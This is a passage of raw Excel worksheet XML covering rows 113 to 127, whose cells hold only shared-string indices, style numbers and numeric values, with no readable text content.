        <v>10</v>
      </c>
      <c r="M113" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N113" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O113" s="47" t="s">
        <v>820</v>
      </c>
      <c r="P113" s="47">
        <v>6.0</v>
      </c>
      <c r="Q113" s="47">
        <v>6.0</v>
      </c>
      <c r="R113" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S113" s="48" t="s">
        <v>820</v>
      </c>
      <c r="T113" s="48">
        <v>6.0</v>
      </c>
      <c r="U113" s="48">
        <v>6.0</v>
      </c>
      <c r="V113" s="46" t="s">
        <v>807</v>
      </c>
      <c r="W113" s="49" t="s">
        <v>821</v>
      </c>
      <c r="X113" s="49">
        <v>10.0</v>
      </c>
      <c r="Y113" s="49">
        <v>12.0</v>
      </c>
      <c r="Z113" s="46" t="s">
        <v>822</v>
      </c>
      <c r="AA113" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB113" s="62" t="s">
        <v>823</v>
      </c>
      <c r="AC113" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD113" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE113" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF113" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG113" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="114" ht="153.75" customHeight="1">
      <c r="B114" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C114" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D114" s="43" t="s">
        <v>824</v>
      </c>
      <c r="E114" s="43" t="s">
        <v>825</v>
      </c>
      <c r="F114" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G114" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H114" s="44" t="s">
        <v>826</v>
      </c>
      <c r="I114" s="44" t="s">
        <v>423</v>
      </c>
      <c r="J114" s="44" t="s">
        <v>827</v>
      </c>
      <c r="K114" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L114" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M114" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N114" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O114" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P114" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q114" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R114" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S114" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T114" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U114" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V114" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W114" s="49">
        <v>2002749.2002752</v>
      </c>
      <c r="X114" s="49">
        <v>2.0</v>
      </c>
      <c r="Y114" s="49">
        <v>6.0</v>
      </c>
      <c r="Z114" s="46">
        <v>2002749.2002752</v>
      </c>
      <c r="AA114" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB114" s="62" t="s">
        <v>828</v>
      </c>
      <c r="AC114" s="62" t="s">
        <v>829</v>
      </c>
      <c r="AD114" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE114" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF114" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG114" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="115" ht="153.75" customHeight="1">
      <c r="B115" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C115" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D115" s="43" t="s">
        <v>830</v>
      </c>
      <c r="E115" s="43" t="s">
        <v>831</v>
      </c>
      <c r="F115" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G115" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H115" s="44" t="s">
        <v>832</v>
      </c>
      <c r="I115" s="44" t="s">
        <v>833</v>
      </c>
      <c r="J115" s="44" t="s">
        <v>834</v>
      </c>
      <c r="K115" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L115" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M115" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N115" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O115" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P115" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q115" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R115" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S115" s="48">
        <v>44489.0</v>
      </c>
      <c r="T115" s="48">
        <v>1.0</v>
      </c>
      <c r="U115" s="48">
        <v>1.0</v>
      </c>
      <c r="V115" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W115" s="49" t="s">
        <v>835</v>
      </c>
      <c r="X115" s="49">
        <v>5.0</v>
      </c>
      <c r="Y115" s="49">
        <v>9.0</v>
      </c>
      <c r="Z115" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA115" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB115" s="62" t="s">
        <v>836</v>
      </c>
      <c r="AC115" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD115" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE115" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF115" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG115" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="116" ht="153.75" customHeight="1">
      <c r="B116" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C116" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D116" s="43" t="s">
        <v>837</v>
      </c>
      <c r="E116" s="43" t="s">
        <v>838</v>
      </c>
      <c r="F116" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G116" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H116" s="44" t="s">
        <v>839</v>
      </c>
      <c r="I116" s="44" t="s">
        <v>840</v>
      </c>
      <c r="J116" s="44" t="s">
        <v>841</v>
      </c>
      <c r="K116" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L116" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M116" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N116" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O116" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P116" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q116" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R116" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S116" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T116" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U116" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V116" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W116" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X116" s="49">
        <v>2.0</v>
      </c>
      <c r="Y116" s="49">
        <v>2.0</v>
      </c>
      <c r="Z116" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA116" s="61" t="s">
        <v>181</v>
      </c>
      <c r="AB116" s="62" t="s">
        <v>842</v>
      </c>
      <c r="AC116" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD116" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE116" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF116" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG116" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="117" ht="153.75" customHeight="1">
      <c r="B117" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C117" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D117" s="43" t="s">
        <v>844</v>
      </c>
      <c r="E117" s="43" t="s">
        <v>845</v>
      </c>
      <c r="F117" s="52" t="s">
        <v>846</v>
      </c>
      <c r="G117" s="43" t="s">
        <v>847</v>
      </c>
      <c r="H117" s="44" t="s">
        <v>848</v>
      </c>
      <c r="I117" s="44" t="s">
        <v>460</v>
      </c>
      <c r="J117" s="44" t="s">
        <v>849</v>
      </c>
      <c r="K117" s="45" t="s">
        <v>850</v>
      </c>
      <c r="L117" s="45">
        <v>3.0</v>
      </c>
      <c r="M117" s="45">
        <v>48.0</v>
      </c>
      <c r="N117" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O117" s="47" t="s">
        <v>851</v>
      </c>
      <c r="P117" s="47">
        <v>3.0</v>
      </c>
      <c r="Q117" s="47">
        <v>48.0</v>
      </c>
      <c r="R117" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S117" s="48" t="s">
        <v>852</v>
      </c>
      <c r="T117" s="48">
        <v>4.0</v>
      </c>
      <c r="U117" s="48">
        <v>112.0</v>
      </c>
      <c r="V117" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W117" s="49" t="s">
        <v>853</v>
      </c>
      <c r="X117" s="49">
        <v>8.0</v>
      </c>
      <c r="Y117" s="49">
        <v>148.0</v>
      </c>
      <c r="Z117" s="46" t="s">
        <v>854</v>
      </c>
      <c r="AA117" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB117" s="62" t="s">
        <v>855</v>
      </c>
      <c r="AC117" s="62" t="s">
        <v>856</v>
      </c>
      <c r="AD117" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE117" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF117" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG117" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="118" ht="153.75" customHeight="1">
      <c r="B118" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C118" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D118" s="43" t="s">
        <v>844</v>
      </c>
      <c r="E118" s="43" t="s">
        <v>845</v>
      </c>
      <c r="F118" s="52" t="s">
        <v>846</v>
      </c>
      <c r="G118" s="43" t="s">
        <v>847</v>
      </c>
      <c r="H118" s="44" t="s">
        <v>857</v>
      </c>
      <c r="I118" s="44" t="s">
        <v>858</v>
      </c>
      <c r="J118" s="44" t="s">
        <v>859</v>
      </c>
      <c r="K118" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L118" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M118" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N118" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O118" s="47">
        <v>2043217.0</v>
      </c>
      <c r="P118" s="47">
        <v>1.0</v>
      </c>
      <c r="Q118" s="47">
        <v>5.0</v>
      </c>
      <c r="R118" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S118" s="48">
        <v>2043217.504</v>
      </c>
      <c r="T118" s="48">
        <v>2.0</v>
      </c>
      <c r="U118" s="48">
        <v>8.0</v>
      </c>
      <c r="V118" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W118" s="49" t="s">
        <v>860</v>
      </c>
      <c r="X118" s="49">
        <v>9.0</v>
      </c>
      <c r="Y118" s="49">
        <v>28.0</v>
      </c>
      <c r="Z118" s="46" t="s">
        <v>346</v>
      </c>
      <c r="AA118" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB118" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC118" s="62" t="s">
        <v>861</v>
      </c>
      <c r="AD118" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE118" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF118" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG118" s="63" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="119" ht="153.75" customHeight="1">
      <c r="B119" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C119" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D119" s="43" t="s">
        <v>862</v>
      </c>
      <c r="E119" s="43" t="s">
        <v>863</v>
      </c>
      <c r="F119" s="52" t="s">
        <v>864</v>
      </c>
      <c r="G119" s="43" t="s">
        <v>865</v>
      </c>
      <c r="H119" s="44" t="s">
        <v>866</v>
      </c>
      <c r="I119" s="44" t="s">
        <v>867</v>
      </c>
      <c r="J119" s="44" t="s">
        <v>868</v>
      </c>
      <c r="K119" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L119" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M119" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N119" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O119" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P119" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q119" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R119" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S119" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T119" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U119" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V119" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z119" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA119" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB119" s="62" t="s">
        <v>869</v>
      </c>
      <c r="AC119" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD119" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE119" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF119" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG119" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="120" ht="153.75" customHeight="1">
      <c r="B120" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C120" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D120" s="43" t="s">
        <v>870</v>
      </c>
      <c r="E120" s="43" t="s">
        <v>871</v>
      </c>
      <c r="F120" s="52" t="s">
        <v>872</v>
      </c>
      <c r="G120" s="43" t="s">
        <v>873</v>
      </c>
      <c r="H120" s="44" t="s">
        <v>874</v>
      </c>
      <c r="I120" s="44" t="s">
        <v>875</v>
      </c>
      <c r="J120" s="44" t="s">
        <v>876</v>
      </c>
      <c r="K120" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L120" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M120" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N120" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O120" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P120" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q120" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R120" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S120" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T120" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U120" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V120" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W120" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X120" s="49">
        <v>2.0</v>
      </c>
      <c r="Y120" s="49">
        <v>8.0</v>
      </c>
      <c r="Z120" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA120" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB120" s="62" t="s">
        <v>877</v>
      </c>
      <c r="AC120" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD120" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE120" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF120" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG120" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="121" ht="153.75" customHeight="1">
      <c r="B121" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C121" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D121" s="43" t="s">
        <v>878</v>
      </c>
      <c r="E121" s="43" t="s">
        <v>879</v>
      </c>
      <c r="F121" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G121" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H121" s="44" t="s">
        <v>880</v>
      </c>
      <c r="I121" s="44" t="s">
        <v>881</v>
      </c>
      <c r="J121" s="44" t="s">
        <v>882</v>
      </c>
      <c r="K121" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L121" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M121" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N121" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O121" s="100" t="s">
        <v>574</v>
      </c>
      <c r="P121" s="47">
        <v>2.0</v>
      </c>
      <c r="Q121" s="47">
        <v>2.0</v>
      </c>
      <c r="R121" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S121" s="101" t="s">
        <v>574</v>
      </c>
      <c r="T121" s="48">
        <v>2.0</v>
      </c>
      <c r="U121" s="48">
        <v>2.0</v>
      </c>
      <c r="V121" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W121" s="49" t="s">
        <v>883</v>
      </c>
      <c r="X121" s="49">
        <v>5.0</v>
      </c>
      <c r="Y121" s="49">
        <v>20.0</v>
      </c>
      <c r="Z121" s="46" t="s">
        <v>506</v>
      </c>
      <c r="AA121" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB121" s="62" t="s">
        <v>884</v>
      </c>
      <c r="AC121" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD121" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE121" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF121" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG121" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="122" ht="153.75" customHeight="1">
      <c r="B122" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C122" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D122" s="43" t="s">
        <v>885</v>
      </c>
      <c r="E122" s="43" t="s">
        <v>886</v>
      </c>
      <c r="F122" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G122" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H122" s="44" t="s">
        <v>887</v>
      </c>
      <c r="I122" s="44" t="s">
        <v>888</v>
      </c>
      <c r="J122" s="44" t="s">
        <v>889</v>
      </c>
      <c r="K122" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L122" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M122" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N122" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O122" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P122" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q122" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R122" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S122" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T122" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U122" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V122" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W122" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X122" s="49">
        <v>2.0</v>
      </c>
      <c r="Y122" s="49">
        <v>2.0</v>
      </c>
      <c r="Z122" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA122" s="102" t="s">
        <v>188</v>
      </c>
      <c r="AB122" s="98" t="s">
        <v>890</v>
      </c>
      <c r="AC122" s="62" t="s">
        <v>891</v>
      </c>
      <c r="AD122" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE122" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF122" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG122" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="123" ht="153.75" customHeight="1">
      <c r="B123" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C123" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D123" s="43" t="s">
        <v>892</v>
      </c>
      <c r="E123" s="43" t="s">
        <v>893</v>
      </c>
      <c r="F123" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G123" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H123" s="44" t="s">
        <v>894</v>
      </c>
      <c r="I123" s="44" t="s">
        <v>895</v>
      </c>
      <c r="J123" s="44" t="s">
        <v>896</v>
      </c>
      <c r="K123" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L123" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M123" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N123" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O123" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P123" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q123" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R123" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S123" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T123" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U123" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V123" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z123" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA123" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB123" s="62" t="s">
        <v>897</v>
      </c>
      <c r="AC123" s="62" t="s">
        <v>898</v>
      </c>
      <c r="AD123" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE123" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF123" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG123" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="124" ht="153.75" customHeight="1">
      <c r="B124" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C124" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D124" s="43" t="s">
        <v>899</v>
      </c>
      <c r="E124" s="43" t="s">
        <v>900</v>
      </c>
      <c r="F124" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G124" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H124" s="44" t="s">
        <v>901</v>
      </c>
      <c r="I124" s="44" t="s">
        <v>858</v>
      </c>
      <c r="J124" s="44" t="s">
        <v>902</v>
      </c>
      <c r="K124" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L124" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M124" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N124" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O124" s="47" t="s">
        <v>903</v>
      </c>
      <c r="P124" s="47">
        <v>4.0</v>
      </c>
      <c r="Q124" s="47">
        <v>8.0</v>
      </c>
      <c r="R124" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S124" s="48" t="s">
        <v>904</v>
      </c>
      <c r="T124" s="48">
        <v>5.0</v>
      </c>
      <c r="U124" s="48">
        <v>10.0</v>
      </c>
      <c r="V124" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W124" s="49" t="s">
        <v>905</v>
      </c>
      <c r="X124" s="49">
        <v>9.0</v>
      </c>
      <c r="Y124" s="49">
        <v>21.0</v>
      </c>
      <c r="Z124" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA124" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB124" s="62" t="s">
        <v>906</v>
      </c>
      <c r="AC124" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD124" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE124" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF124" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG124" s="63" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="125" ht="153.75" customHeight="1">
      <c r="A125" s="106"/>
      <c r="B125" s="42" t="s">
        <v>843</v>
      </c>
      <c r="C125" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D125" s="43" t="s">
        <v>907</v>
      </c>
      <c r="E125" s="43" t="s">
        <v>908</v>
      </c>
      <c r="F125" s="43" t="s">
        <v>909</v>
      </c>
      <c r="G125" s="43" t="s">
        <v>910</v>
      </c>
      <c r="H125" s="44" t="s">
        <v>911</v>
      </c>
      <c r="I125" s="44" t="s">
        <v>912</v>
      </c>
      <c r="J125" s="44" t="s">
        <v>913</v>
      </c>
      <c r="K125" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L125" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M125" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N125" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O125" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P125" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q125" s="47"/>
      <c r="R125" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S125" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T125" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U125" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V125" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y125" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z125" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA125" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB125" s="62" t="s">
        <v>897</v>
      </c>
      <c r="AC125" s="62" t="s">
        <v>914</v>
      </c>
      <c r="AD125" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE125" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF125" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG125" s="63" t="s">
        <v>58</v>
      </c>
      <c r="AH125" s="106"/>
    </row>
    <row r="126" ht="153.75" customHeight="1">
      <c r="A126" s="106"/>
      <c r="B126" s="42" t="s">
        <v>915</v>
      </c>
      <c r="C126" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D126" s="43" t="s">
        <v>916</v>
      </c>
      <c r="E126" s="43" t="s">
        <v>917</v>
      </c>
      <c r="F126" s="43" t="s">
        <v>918</v>
      </c>
      <c r="G126" s="43" t="s">
        <v>919</v>
      </c>
      <c r="H126" s="44" t="s">
        <v>920</v>
      </c>
      <c r="I126" s="44" t="s">
        <v>921</v>
      </c>
      <c r="J126" s="44" t="s">
        <v>922</v>
      </c>
      <c r="K126" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L126" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M126" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N126" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O126" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P126" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q126" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R126" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S126" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T126" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U126" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V126" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W126" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X126" s="49">
        <v>2.0</v>
      </c>
      <c r="Y126" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z126" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA126" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB126" s="62" t="s">
        <v>897</v>
      </c>
      <c r="AC126" s="62" t="s">
        <v>923</v>
      </c>
      <c r="AD126" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE126" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF126" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG126" s="63" t="s">
        <v>58</v>
      </c>
      <c r="AH126" s="106"/>
    </row>
    <row r="127" ht="153.75" customHeight="1">
      <c r="A127" s="106"/>
      <c r="B127" s="42" t="s">
        <v>915</v>
      </c>
      <c r="C127" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D127" s="43" t="s">
        <v>924</v>
      </c>
      <c r="E127" s="43" t="s">
        <v>925</v>
      </c>
      <c r="F127" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G127" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H127" s="44" t="s">
        <v>926</v>
      </c>
      <c r="I127" s="44" t="s">
        <v>282</v>
      </c>
      <c r="J127" s="44" t="s">
        <v>927</v>
      </c>
      <c r="K127" s="105">
        <v>1394.0</v>
      </c>
      <c r="L127" s="45">
        <v>1.0</v>
      </c>
      <c r="M127" s="45">
        <v>18.0</v>
      </c>
      <c r="N127" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O127" s="56">
        <v>1394.0</v>
      </c>
      <c r="P127" s="47">
        <v>1.0</v>
      </c>
      <c r="Q127" s="47">
        <v>18.0</v>
      </c>
      <c r="R127" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S127" s="48" t="s">
        <v>928</v>
      </c>
      <c r="T127" s="48">
        <v>2.0</v>
      </c>
      <c r="U127" s="48">
        <v>40.0</v>
      </c>
      <c r="V127" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W127" s="49" t="s">
        <v>929</v>
      </c>
      <c r="X127" s="49">
        <v>4.0</v>
      </c>
      <c r="Y127" s="49">
        <v>44.0</v>
      </c>
      <c r="Z127" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA127" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB127" s="62" t="s">
        <v>930</v>
      </c>
      <c r="AC127" s="62" t="s">
        <v>931</v>
      </c>
      <c r="AD127" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE127" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF127" s="50" t="s">
